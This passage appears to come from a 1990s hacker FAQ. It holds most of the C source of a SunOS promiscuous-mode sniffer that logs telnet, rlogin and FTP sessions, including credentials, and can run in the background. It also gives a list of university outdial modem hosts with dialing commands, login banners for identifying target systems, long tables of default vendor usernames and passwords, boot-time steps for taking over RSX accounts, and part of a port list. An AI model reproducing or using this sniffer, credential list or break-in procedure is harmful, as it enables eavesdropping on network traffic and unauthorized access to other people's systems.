  946. #define PR_DATA(dp,ln) {    \
  947.   register u_char lastc=0; \
  948.   while(ln-- >0) { \
  949.      if(*dp < 32) {  \
  950.         switch(*dp) { \
  951.             case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
  952.                         break; \
  953.             case '\r': \
  954.             case '\n': fprintf(LOG,"\n     : "); \
  955.                         break; \
  956.             default  : fprintf(LOG,"^%c", (*dp + 64)); \
  957.                         break; \
  958.         } \
  959.      } else { \
  960.         if(isprint(*dp)) fputc(*dp,LOG); \
  961.         else fprintf(LOG,"(%d)",*dp); \
  962.      } \
  963.      lastc = *dp++; \
  964.   } \
  965.   fflush(LOG); \
  966. }
  967.  
  968. void END_NODE(CLe,d,dl,msg)
  969. register struct CREC *CLe;
  970. register u_char *d;
  971. register int dl;
  972. register char *msg;
  973. {
  974.    fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
  975.    fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
  976.    fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
  977.    fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
  978.                         NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
  979.    fprintf(LOG," DATA: ");
  980.     { register u_int i = CLe->Length;
  981.       register u_char *p = CLe->Data;
  982.       PR_DATA(p,i);
  983.       PR_DATA(d,dl);
  984.     }
  985.  
  986.    fprintf(LOG,"\n-- \n");
  987.    fflush(LOG);
  988.  
  989.    if(CLe->Next != NULL)
  990.     CLe->Next->Last = CLe->Last;
  991.    if(CLe->Last != NULL)
  992.     CLe->Last->Next = CLe->Next;
  993.    else
  994.     CLroot = CLe->Next;
  995.    free(CLe);
  996. }
  997.  
  998. /* 30 mins (x 60 seconds) */
  999. #define IDLE_TIMEOUT 1800
  1000. #define IDLE_NODE() { \
  1001.   time_t tm; \
  1002.   time(&tm); \
  1003.   if(LastTIME<tm) { \
  1004.      register struct CREC *CLe,*CLt = CLroot; \
  1005.      LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
  1006.      while(CLe=CLt) { \
  1007.        CLt=CLe->Next; \
  1008.        if(CLe->Time <tm) \
  1009.            END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
  1010.      } \
  1011.   } \
  1012. }
  1013.  
  1014. void filter(cp, pktlen)
  1015. register char *cp;
  1016. register u_int pktlen;
  1017. {
  1018.  register struct ip     *ip;
  1019.  register struct tcphdr *tcph;
  1020.  
  1021.  { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
  1022.  
  1023.    if(EtherType < 0x600) {
  1024.      EtherType = *(u_short *)(cp + SZETH + 6);
  1025.      cp+=8; pktlen-=8;
  1026.    }
  1027.  
  1028.    if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
  1029.       return;
  1030.  }
  1031.  
  1032.     /* ugh, gotta do an alignment :-( */
  1033.  bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
  1034.  
  1035.  ip = (struct ip *)Packet;
  1036.  if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
  1037.     return;
  1038.  tcph = (struct tcphdr *)(Packet + IPHLEN);
  1039.  
  1040.  if(!( (TCPD == IPPORT_TELNET) ||
  1041.        (TCPD == IPPORT_LOGINSERVER) ||
  1042.        (TCPD == IPPORT_FTP)
  1043.    )) return;
  1044.  
  1045.  { register struct CREC *CLm;
  1046.    register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
  1047.    register u_char *p = (u_char *)Packet;
  1048.  
  1049.    p += ((IPHLEN * 4) + (TCPOFF * 4));
  1050.  
  1051.  if(debug) {
  1052.   fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
  1053.   fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
  1054.   fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
  1055.  }
  1056.  
  1057.    if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
  1058.  
  1059.       CLm->PKcnt++;
  1060.  
  1061.       if(length>0)
  1062.         if( (CLm->Length + length) < MAXBUFLEN ) {
  1063.           ADDDATA_NODE( CLm, p,length);
  1064.         } else {
  1065.           END_NODE( CLm, p,length, "DATA LIMIT");
  1066.         }
  1067.  
  1068.       if(TCPFL(TH_FIN|TH_RST)) {
  1069.           END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
  1070.       }
  1071.  
  1072.    } else {
  1073.  
  1074.       if(TCPFL(TH_SYN)) {
  1075.          ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
  1076.       }
  1077.  
  1078.    }
  1079.  
  1080.    IDLE_NODE();
  1081.  
  1082.  }
  1083.  
  1084. }
  1085.  
  1086. /* signal handler
  1087.  */
  1088. void death()
  1089. { register struct CREC *CLe;
  1090.  
  1091.     while(CLe=CLroot)
  1092.         END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
  1093.  
  1094.     fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
  1095.     fflush(LOG);
  1096.     if(LOG != stdout)
  1097.         fclose(LOG);
  1098.     exit(1);
  1099. }
  1100.  
  1101. /* opens network interface, performs ioctls and reads from it,
  1102.  * passing data to filter function
  1103.  */
  1104. void do_it()
  1105. {
  1106.     int cc;
  1107.     char *buf;
  1108.     u_short sp_ts_len;
  1109.  
  1110.     if(!(buf=malloc(CHUNKSIZE)))
  1111.         Pexit(1,"Eth: malloc");
  1112.  
  1113. /* this /dev/nit initialization code pinched from etherfind */
  1114.   {
  1115.     struct strioctl si;
  1116.     struct ifreq    ifr;
  1117.     struct timeval  timeout;
  1118.     u_int  chunksize = CHUNKSIZE;
  1119.     u_long if_flags  = NI_PROMISC;
  1120.  
  1121.     if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
  1122.         Pexit(1,"Eth: nit open");
  1123.  
  1124.     if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
  1125.         Pexit(1,"Eth: ioctl (I_SRDOPT)");
  1126.  
  1127.     si.ic_timout = INFTIM;
  1128.  
  1129.     if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
  1130.         Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
  1131.  
  1132.     timeout.tv_sec = 1;
  1133.     timeout.tv_usec = 0;
  1134.     si.ic_cmd = NIOCSTIME;
  1135.     si.ic_len = sizeof(timeout);
  1136.     si.ic_dp  = (char *)&timeout;
  1137.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1138.         Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
  1139.  
  1140.     si.ic_cmd = NIOCSCHUNK;
  1141.     si.ic_len = sizeof(chunksize);
  1142.     si.ic_dp  = (char *)&chunksize;
  1143.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1144.         Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
  1145.  
  1146.     strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
  1147.     ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
  1148.     si.ic_cmd = NIOCBIND;
  1149.     si.ic_len = sizeof(ifr);
  1150.     si.ic_dp  = (char *)𝔦
  1151.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1152.         Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
  1153.  
  1154.     si.ic_cmd = NIOCSFLAGS;
  1155.     si.ic_len = sizeof(if_flags);
  1156.     si.ic_dp  = (char *)&if_flags;
  1157.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1158.         Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
  1159.  
  1160.     if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
  1161.         Pexit(1,"Eth: ioctl (I_FLUSH)");
  1162.   }
  1163.  
  1164.     while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
  1165.         register char *bp = buf,
  1166.                       *bufstop = (buf + cc);
  1167.  
  1168.         while (bp < bufstop) {
  1169.             register char *cp = bp;
  1170.             register struct nit_bufhdr *hdrp;
  1171.  
  1172.             hdrp = (struct nit_bufhdr *)cp;
  1173.             cp += sizeof(struct nit_bufhdr);
  1174.             bp += hdrp->nhb_totlen;
  1175.             filter(cp, (u_long)hdrp->nhb_msglen);
  1176.         }
  1177.     }
  1178.     Pexit((-1),"Eth: read");
  1179. }
  1180.  /* Authorize your proogie,generate your own password and uncomment here */
  1181. /* #define AUTHPASSWD "EloiZgZejWyms" */
  1182.  
  1183. void getauth()
  1184. { char *buf,*getpass(),*crypt();
  1185.   char pwd[21],prmpt[81];
  1186.  
  1187.     strcpy(pwd,AUTHPASSWD);
  1188.     sprintf(prmpt,"(%s)UP? ",ProgName);
  1189.     buf=getpass(prmpt);
  1190.     if(strcmp(pwd,crypt(buf,pwd)))
  1191.         exit(1);
  1192. }
  1193.     */
  1194. void main(argc, argv)
  1195. int argc;
  1196. char **argv;
  1197. {
  1198.     char   cbuf[BUFSIZ];
  1199.     struct ifconf ifc;
  1200.     int    s,
  1201.            ac=1,
  1202.            backg=0;
  1203.  
  1204.     ProgName=argv[0];
  1205.  
  1206.  /*     getauth(); */
  1207.  
  1208.     LOG=NULL;
  1209.     device=NULL;
  1210.     while((ac<argc) && (argv[ac][0] == '-')) {
  1211.        register char ch = argv[ac++][1];
  1212.        switch(toupper(ch)) {
  1213.             case 'I': device=argv[ac++];
  1214.                       break;
  1215.             case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
  1216.                          Zexit(1,"Output file cant be opened\n");
  1217.                       break;
  1218.             case 'B': backg=1;
  1219.                       break;
  1220.             case 'D': debug=1;
  1221.                       break;
  1222.             default : fprintf(ERR,
  1223.                         "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
  1224.                             ProgName);
  1225.                       exit(1);
  1226.        }
  1227.     }
  1228.  
  1229.     if(!device) {
  1230.         if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
  1231.             Pexit(1,"Eth: socket");
  1232.  
  1233.         ifc.ifc_len = sizeof(cbuf);
  1234.         ifc.ifc_buf = cbuf;
  1235.         if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
  1236.             Pexit(1,"Eth: ioctl");
  1237.  
  1238.         close(s);
  1239.         device = ifc.ifc_req->ifr_name;
  1240.     }
  1241.  
  1242.     fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
  1243.     fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
  1244.             (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
  1245.  
  1246.     if(!LOG)
  1247.         LOG=stdout;
  1248.  
  1249.     signal(SIGINT, death);
  1250.     signal(SIGTERM,death);
  1251.     signal(SIGKILL,death);
  1252.     signal(SIGQUIT,death);
  1253.  
  1254.     if(backg && debug) {
  1255.          fprintf(ERR,"[Cannot bg with debug on]\n");
  1256.          backg=0;
  1257.     }
  1258.  
  1259.     if(backg) {
  1260.         register int s;
  1261.  
  1262.         if((s=fork())>0) {
  1263.            fprintf(ERR,"[pid %d]\n",s);
  1264.            exit(0);
  1265.         } else if(s<0)
  1266.            Pexit(1,"fork");
  1267.  
  1268.         if( (s=open("/dev/tty",O_RDWR))>0 ) {
  1269.                 ioctl(s,TIOCNOTTY,(char *)NULL);
  1270.                 close(s);
  1271.         }
  1272.     }
  1273.     fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
  1274.     fflush(LOG);
  1275.  
  1276.     do_it();
  1277. }
  1278.  
  1279.  
  1280. 18. What is an Internet Outdial?
  1281.  
  1282. An Internet outdial is a modem connected to the Internet than you can
  1283. use to dial out.  Normal outdials will only call local numbers.  A GOD
  1284. (Global OutDial) is capable of calling long distance.  Outdials are an
  1285. inexpensive method of calling long distance BBS's.
  1286.  
  1287.  
  1288. 19. What are some Internet Outdials?
  1289.  
  1290.  
  1291. Area    Address(s)                      Command(s)
  1292. ------  ------------------------------- ---------------------
  1293. 201     128.112.88.0
  1294.         128.112.88.1
  1295.         128.112.88.2
  1296.         128.112.88.3
  1297. 204     umnet.cc.manitoba.ca            "dial12" or "dial24"
  1298. 206     dialout24.cac.washington.edu
  1299. 215     wiseowl.ocis.temple.edu         atz
  1300.                                         atdt 9xxxyyyy
  1301.         129.72.1.59                     hayes compat
  1302. 218     aa28.d.umn.edu                  cli
  1303.                                         rlogin modem
  1304.                                         at "login:" type
  1305.                                         "modem"
  1306.         modem.d.umn.edu                 "Hayes"
  1307. 232     isn.rdns.iastate.edu            MODEM              [Works!!]
  1308.                                         atz
  1309.                                         atdt8xxx-xxxx
  1310. 303     129.82.100.64                   login: modem       [need password!]
  1311. 307     modem.uwyo.edu
  1312.         129.72.1.59                     hayes compat
  1313. 313     35.1.1.6                        "dial2400-aa" or   [can't connect]
  1314.                                         "dial1200-aa"
  1315. 315     198.36.22.3                     "modem"
  1316. 404     emory.edu                       .modem8 or
  1317.                                         .dialout
  1318.         broadband.cc.emory.edu          .modem8 or
  1319.                                         .dialout
  1320.         128.140.1.239                   .modem8|CR
  1321.                                         or .modem96|CR
  1322. 412     gate.cis.pitt.edu               LAT
  1323.                                         connect dialout
  1324.                                         ^E
  1325.                                         atdt 91k xxx-xxxx
  1326. 415     128.32.132.250                  "dial1" or "dial2"
  1327. 416     pacx.utcs.utoronto.ca           modem
  1328.                                         atdt 9xxx-xxxx
  1329. 502     uknet.uky.edu                   outdial2400
  1330.                                         atdt 9xxx-xxxx
  1331. 510     annex132-1.eecs.berkeley.edu    atdt 9,,,,, xxx-xxxx
  1332. 514     132.204.2.11                    externe#9 9xxx-xxxx
  1333. 515     isn.rdns.iastate.edu            login MODEM
  1334.                                         dial atdt8xxx-yyyy
  1335. 602     129.219.17.3                    atdt8,,,,,xyyyxxxyyyy
  1336.         129.219.17.3                    login: MODEM
  1337.                                         atdt 8xxx-xxxx
  1338. 609     129.72.1.59                     "Hayes"
  1339.         128.119.131.110                 "Hayes"
  1340.         128.119.131.111
  1341.         128.119.131.112
  1342.         128.119.131.113
  1343.         128.119.131.114
  1344.         128.112.131.110
  1345.         128.112.131.111
  1346.         128.112.131.112
  1347.         128.112.131.113
  1348.         128.112.131.114                 the above are hayes
  1349. 614     ns2400.ircc.ohio-state.edu      DIAL               [can't connect]
  1350. 615     dca.utk.edu                     "dial2400"
  1351. 617     dialout.lcs.mit.edu
  1352. 619     dialin.ucsd.edu                 "dialout"
  1353.         128.54.30.1                     nue
  1354. 713     128.143.70.101                  "connect hayes"
  1355.         128.249.27.154                  c modem96
  1356.                                         atdt 9xxx-xxxx
  1357.         128.249.27.153                  " -+ as above +- "
  1358.         modem24.bcm.tmc.edu
  1359.         modem12.bcm.tmc.edu
  1360. 714     130.191.4.70                    atdt 8xxx-xxxx
  1361. 804     ublan.acc.virginia.edu          c hayes
  1362.         128.143.70.101                  connect hayes
  1363.                                         atdt xxx-xxxx
  1364. 902     star.ccs.tuns.ca                "dialout"          [down...]
  1365. 916     128.120.2.251                   "dialout"          [down...]
  1366.         129.137.33.72                                      [can't connect]
  1367. ???     dialout1.princeton.edu                             [can't connect]
  1368.         dswitch.byu.edu                 "C Modem"          [can't connect]
  1369.         modem.cis.uflu.edu                                 [can't connect]
  1370.         r596adi1.uc.edu                                    [can't connect]
  1371.         vtnet1.cns.ut.edu               "CALL" or "call"   [can't connect]
  1372.         18.26.0.55                                         [can't connect]
  1373.         128.173.5.4                                        [need password!]
  1374.         128.187.1.2                                        [need password!]
  1375.         129.137.33.71                                      [can't connect]
  1376.         bstorm.bga.com / port=4000                         [what is this?]
  1377.  
  1378.  
  1379.  
  1380. 20. What is this system?
  1381.  
  1382.  
  1383. AIX
  1384. ~~~
  1385. IBM AIX Version 3 for RISC System/6000
  1386. (C) Copyrights by IBM and by others 1982, 1990.
  1387. login:
  1388.  
  1389. [You will know an AIX system because it is the only Unix system that]
  1390. [clears the screen and issues a login prompt near the bottom of the]
  1391. [screen]
  1392.  
  1393.  
  1394. AS/400
  1395. ~~~~~~
  1396. UserID?
  1397. Password?
  1398.  
  1399. Once in, type GO MAIN
  1400.  
  1401.  
  1402. CDC Cyber
  1403. ~~~~~~~~~
  1404. WELCOME TO THE NOS SOFTWARE SYSTEM.
  1405. COPYRIGHT CONTROL DATA 1978, 1987.
  1406.  
  1407. 88/02/16. 02.36.53. N265100
  1408. CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
  1409. FAMILY:
  1410.  
  1411. You would normally just hit return at the family prompt.  Next prompt is:
  1412.  
  1413. USER NAME:
  1414.  
  1415.  
  1416. CISCO Router
  1417. ~~~~~~~~~~~~
  1418.                              FIRST BANK OF TNO
  1419.                            95-866 TNO VirtualBank
  1420.                           REMOTE Router -  TN043R1
  1421.  
  1422.                                 Console Port
  1423.  
  1424.                                 SN - 00000866
  1425.  
  1426. TN043R1>
  1427.  
  1428.  
  1429. DECserver
  1430. ~~~~~~~~~
  1431. DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1
  1432. DPS502-DS700
  1433.  
  1434. (c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved
  1435.  
  1436. Please type HELP if you need assistance
  1437.  
  1438. Enter username> TNO
  1439.  
  1440. Local>
  1441.  
  1442.  
  1443. Hewlett Packard MPE-XL
  1444. ~~~~~~~~~~~~~~~~~~~~~~
  1445. MPE XL:
  1446. EXPECTED A :HELLO COMMAND. (CIERR 6057)
  1447. MPE XL:
  1448. EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)
  1449. MPE XL:
  1450.  
  1451.  
  1452. GTN
  1453. ~~~
  1454. WELCOME TO CITIBANK. PLEASE SIGN ON.
  1455. XXXXXXXX
  1456.  
  1457. @
  1458. PASSWORD =
  1459.  
  1460. @
  1461.  
  1462. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1463.  
  1464. PLEASE ENTER YOUR ID:-1->
  1465. PLEASE ENTER YOUR PASSWORD:-2->
  1466.  
  1467. CITICORP (CITY NAME). KEY GHELP FOR HELP.
  1468.   XXX.XXX
  1469.  PLEASE SELECT SERVICE REQUIRED.-3->
  1470.  
  1471.  
  1472. Lantronix Terminal Server
  1473. ~~~~~~~~~~~~~~~~~~~~~~~~~
  1474. Lantronix ETS16 Version V3.1/1(940623)
  1475.  
  1476. Type HELP at the 'Local_15> ' prompt for assistance.
  1477.  
  1478. Login password>
  1479.  
  1480.  
  1481. Meridian Mail (Northern Telecom Phone/Voice Mail System)
  1482. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1483.                             MMM       MMMERIDIAN
  1484.                            MMMMM     MMMMM
  1485.                          MMMMMM   MMMMMM
  1486.                         MMM  MMMMM  MMM     MMMMM     MMMMM
  1487.                       MMM   MMM   MMM     MMMMMM   MMMMMM
  1488.                      MMM         MMM     MMM MMM MMM MMM
  1489.                     MMM         MMM     MMM  MMMMM  MMM
  1490.                    MMM         MMM     MMM   MMM   MMM
  1491.                   MMM         MMM     MMM         MMM
  1492.                  MMM         MMM     MMM         MMM
  1493.                 MMM         MMM     MMM         MMM
  1494.                MMM         MMM     MMM         MMM
  1495.               MMM         MMM     MMM         MMM
  1496.  
  1497.                                           Copyright (c) Northern Telecom, 1991
  1498.  
  1499.  
  1500. Novell ONLAN
  1501. ~~~~~~~~~~~~
  1502.  N
  1503.  
  1504. [To access the systems it is best to own a copy of ONLAN/PC]
  1505.  
  1506.  
  1507. PC-Anywhere
  1508. ~~~~~~~~~~~
  1509.  P
  1510.  
  1511. [To access the systems it is best to own a copy of PCAnywhere Remote]
  1512.  
  1513.  
  1514. PRIMOS
  1515. ~~~~~~
  1516. PRIMENET 19.2.7F PPOA1
  1517.  
  1518. <any text>
  1519.  
  1520. ER!
  1521.  
  1522. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1523.  
  1524. CONNECT
  1525. Primenet V 2.3  (system)
  1526. LOGIN           (you)
  1527. User id?        (system)
  1528. SAPB5           (you)
  1529. Password?       (system)
  1530. DROWSAP         (you)
  1531. OK,             (system)
  1532.  
  1533.  
  1534. ROLM-OSL
  1535. ~~~~~~~~
  1536. MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47
  1537. RELEASE 8003
  1538. OSL, PLEASE.
  1539. ?
  1540.  
  1541.  
  1542. System75
  1543. ~~~~~~~~
  1544. Login: root
  1545. INCORRECT LOGIN
  1546.  
  1547. Login: browse
  1548. Password:
  1549.  
  1550. Software Version: G3s.b16.2.2
  1551.  
  1552. Terminal Type (513, 4410, 4425): [513]
  1553.  
  1554.  
  1555. Tops-10
  1556. ~~~~~~~
  1557. NIH Timesharing
  1558.  
  1559. NIH Tri-SMP 7.02-FF  16:30:04 TTY11
  1560. system 1378/1381/1453 Connected to Node Happy(40) Line # 12
  1561. Please LOGIN
  1562. .
  1563.  
  1564.  
  1565. VM/370
  1566. ~~~~~~
  1567. VM/370
  1568. !
  1569.  
  1570.  
  1571. VM/ESA
  1572. ~~~~~~
  1573. VM/ESA ONLINE
  1574.  
  1575.                                           TBVM2 VM/ESA Rel 1.1     PUT 9200
  1576.  
  1577. Fill in your USERID and PASSWORD and press ENTER
  1578. (Your password will not appear when you type it)
  1579. USERID   ===>
  1580. PASSWORD ===>
  1581.  
  1582. COMMAND  ===>
  1583.  
  1584.  
  1585. Xylogics Annex Communications Server
  1586. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1587. Annex Command Line Interpreter   *   Copyright 1991 Xylogics, Inc.
  1588.  
  1589. Checking authorization, Please wait...
  1590. Annex username: TNO
  1591. Annex password:
  1592.  
  1593. Permission granted
  1594. annex:
  1595.  
  1596.  
  1597. 21. What are the default accounts for XXX?
  1598.  
  1599. AIX
  1600. ~~~
  1601. guest           guest
  1602.  
  1603.  
  1604. AS/400
  1605. ~~~~~~
  1606. qsecofr         qsecofr         /* master security officer */
  1607. qsysopr         qsysopr         /* system operator         */
  1608. qpgmr           qpgmr           /* default programmer      */
  1609.  
  1610. also
  1611.  
  1612. ibm/password
  1613. ibm/2222
  1614. ibm/service
  1615. qsecofr/1111111
  1616. qsecofr/2222222
  1617. qsvr/qsvr
  1618. secofr/secofr
  1619.  
  1620.  
  1621. DECserver
  1622. ~~~~~~~~~
  1623. ACCESS
  1624. SYSTEM
  1625.  
  1626.  
  1627. Hewlett Packard MPE-XL
  1628. ~~~~~~~~~~~~~~~~~~~~~~
  1629. HELLO           MANAGER.SYS
  1630. HELLO           MGR.SYS
  1631. HELLO           FIELD.SUPPORT     HPUNSUP or SUPPORT or HP
  1632. HELLO           OP.OPERATOR
  1633. MGR             CAROLIAN
  1634. MGR             CCC
  1635. MGR             CNAS
  1636. MGR             CONV
  1637. MGR             COGNOS
  1638. OPERATOR        COGNOS
  1639. MANAGER         COGNOS
  1640. OPERATOR        DISC
  1641. MGR             HPDESK
  1642. MGR             HPWORD
  1643. FIELD           HPWORD
  1644. MGR             HPOFFICE
  1645. SPOOLMAN        HPOFFICE
  1646. ADVMAIL         HPOFFICE
  1647. MAIL            HPOFFICE
  1648. WP              HPOFFICE
  1649. MANAGER         HPOFFICE
  1650. MGR             HPONLY
  1651. FIELD           HPP187
  1652. MGR             HPP187
  1653. MGR             HPP189
  1654. MGR             HPP196
  1655. MGR             INTX3
  1656. MGR             ITF3000
  1657. MANAGER         ITF3000
  1658. MAIL            MAIL
  1659. MGR             NETBASE
  1660. MGR             REGO
  1661. MGR             RJE
  1662. MGR             ROBELLE
  1663. MANAGER         SECURITY
  1664. MGR             SECURITY
  1665. FIELD           SERVICE
  1666. MANAGER         SYS
  1667. MGR             SYS
  1668. PCUSER          SYS
  1669. RSBCMON         SYS
  1670. OPERATOR        SYS
  1671. OPERATOR        SYSTEM
  1672. FIELD           SUPPORT
  1673. OPERATOR        SUPPORT
  1674. MANAGER         TCH
  1675. MAIL            TELESUP
  1676. MANAGER         TELESUP
  1677. MGR             TELESUP
  1678. SYS             TELESUP
  1679. MGE             VESOFT
  1680. MGE             VESOFT
  1681. MGR             WORD
  1682. MGR             XLSERVER
  1683.  
  1684. Common jobs are Pub, Sys, Data
  1685. Common passwords are HPOnly, TeleSup, HP, MPE, Manager, MGR, Remote
  1686.  
  1687.  
  1688. Major BBS
  1689. ~~~~~~~~~
  1690. Sysop           Sysop
  1691.  
  1692.  
  1693. PICK O/S
  1694. ~~~~~~~~
  1695. DSA             # Desquetop System Administrator
  1696. DS
  1697. DESQUETOP
  1698. PHANTOM
  1699.  
  1700.  
  1701. Prolog
  1702. ~~~~~~
  1703. PBX             PBX
  1704. NETWORK         NETWORK
  1705. NETOP           <null>
  1706.  
  1707.  
  1708. Rolm
  1709. ~~~~
  1710. CBX Defaults
  1711.  
  1712. op              op
  1713. op              operator
  1714. su              super
  1715. admin           pwp
  1716. eng             engineer
  1717.  
  1718.  
  1719. PhoneMail Defaults
  1720.  
  1721. sysadmin        sysadmin
  1722. tech            tech
  1723. poll            tech
  1724.  
  1725.  
  1726. RSX
  1727. ~~~
  1728. SYSTEM/SYSTEM   (Username SYSTEM, Password SYSTEM)
  1729. 1,1/system      (Directory [1,1] Password SYSTEM)
  1730. BATCH/BATCH
  1731. SYSTEM/MANAGER
  1732. USER/USER
  1733.  
  1734. Default accounts for Micro/RSX:
  1735.  
  1736.                 MICRO/RSX
  1737.  
  1738. Alternately you can hit <CTRL-Z>  when the boot sequence asks you for the
  1739. date and create an account using:
  1740.  
  1741.                 RUN ACNT
  1742.             or  RUN $ACNT
  1743.  
  1744. (Numbers below 10 {oct} are Priveleged)
  1745.  
  1746. Reboot and wait for the date/time question. Type ^C and at the MCR prompt,
  1747. type "abo at." You must include the . dot!
  1748.  
  1749. If this works, type "acs lb0:/blks=1000" to get some swap space so the
  1750. new step won't wedge.
  1751.  
  1752. type " run $acnt" and change the password of any account with a group
  1753. number of 7 or less.
  1754.  
  1755. You may find that the ^C does not work. Try ^Z and ESC as well.
  1756. Also try all 3 as terminators to valid and invalid times.
  1757.  
  1758. If none of the above work, use the halt switch to halt the system,
  1759. just after a invalid date-time.  Look for a user mode PSW 1[4-7]xxxx.
  1760. then deposit 177777 into R6, cross your fingers, write protect the drive
  1761. and continue the system.  This will hopefully result in indirect blowing
  1762. up...  And hopefully the system has not been fully secured.
  1763.  
  1764.  
  1765. System 75
  1766. ~~~~~~~~~
  1767. bcim            bcimpw
  1768. bciim           bciimpw
  1769. bcms            bcmspw, bcms
  1770. bcnas           bcnspw
  1771. blue            bluepw
  1772. browse          looker, browsepw
  1773. craft           crftpw, craftpw, crack
  1774. cust            custpw
  1775. enquiry         enquirypw
  1776. field           support
  1777. inads           indspw, inadspw, inads
  1778. init            initpw
  1779. kraft           kraftpw
  1780. locate          locatepw
  1781. maint           maintpw, rwmaint
  1782. nms             nmspw
  1783. rcust           rcustpw
  1784. support         supportpw
  1785. tech            field
  1786.  
  1787.  
  1788. Taco Bell
  1789. ~~~~~~~~~
  1790. rgm             rollout
  1791. tacobell        <null>
  1792.  
  1793.                 
  1794. Verifone Junior 2.05
  1795. ~~~~~~~~~~~~~~~~~~~~
  1796. Default password: 166816
  1797.  
  1798.  
  1799. VMS
  1800. ~~~
  1801. field           service
  1802. systest         utep
  1803.  
  1804.  
  1805. 22. What port is XXX on?
  1806.  
  1807. The file /etc/services on most Unix machines lists the activity
  1808. occurring on each port.  Here is the most complete port list in
  1809. existence, originally presented in RFC 1340:
  1810.  
  1811. Keyword         Decimal    Description
  1812. -------         -------    -----------
  1813.                   0/tcp    Reserved
  1814.                   0/udp    Reserved
  1815. tcpmux            1/tcp    TCP Port Service Multiplexer
  1816. tcpmux            1/udp    TCP Port Service Multiplexer
  1817. compressnet       2/tcp    Management Utility
  1818. compressnet       2/udp    Management Utility
  1819. compressnet       3/tcp    Compression Process
  1820. compressnet       3/udp    Compression Process
  1821.                   4/tcp    Unassigned
  1822.                   4/udp    Unassigned
  1823. rje               5/tcp    Remote Job Entry
  1824. rje               5/udp    Remote Job Entry
  1825.                   6/tcp    Unassigned
  1826.                   6/udp    Unassigned
  1827. echo              7/tcp    Echo
  1828. echo              7/udp    Echo
  1829.                   8/tcp    Unassigned
  1830.                   8/udp    Unassigned
  1831. discard           9/tcp    Discard
  1832. discard           9/udp    Discard
  1833.                  10/tcp    Unassigned
  1834.                  10/udp    Unassigned
  1835. systat           11/tcp    Active Users
  1836. systat           11/udp    Active Users
  1837.                  12/tcp    Unassigned
  1838.                  12/udp    Unassigned
  1839. daytime          13/tcp    Daytime
  1840. daytime          13/udp    Daytime
  1841.                  14/tcp    Unassigned
  1842.                  14/udp    Unassigned
  1843.                  15/tcp    Unassigned [was netstat]
  1844.                  15/udp    Unassigned
  1845.                  16/tcp    Unassigned
  1846.                  16/udp    Unassigned
  1847. qotd             17/tcp    Quote of the Day
  1848. qotd             17/udp    Quote of the Day
  1849. msp              18/tcp    Message Send Protocol
  1850. msp              18/udp    Message Send Protocol
  1851. chargen          19/tcp    Character Generator
  1852. chargen          19/udp    Character Generator
  1853. ftp-data         20/tcp    File Transfer [Default Data]
  1854. ftp-data         20/udp    File Transfer [Default Data]
  1855. ftp              21/tcp    File Transfer [Control]
  1856. ftp              21/udp    File Transfer [Control]
  1857.                  22/tcp    Unassigned
  1858.                  22/udp    Unassigned
  1859. telnet           23/tcp    Telnet
  1860. telnet           23/udp    Telnet
  1861.                  24/tcp    any private mail system
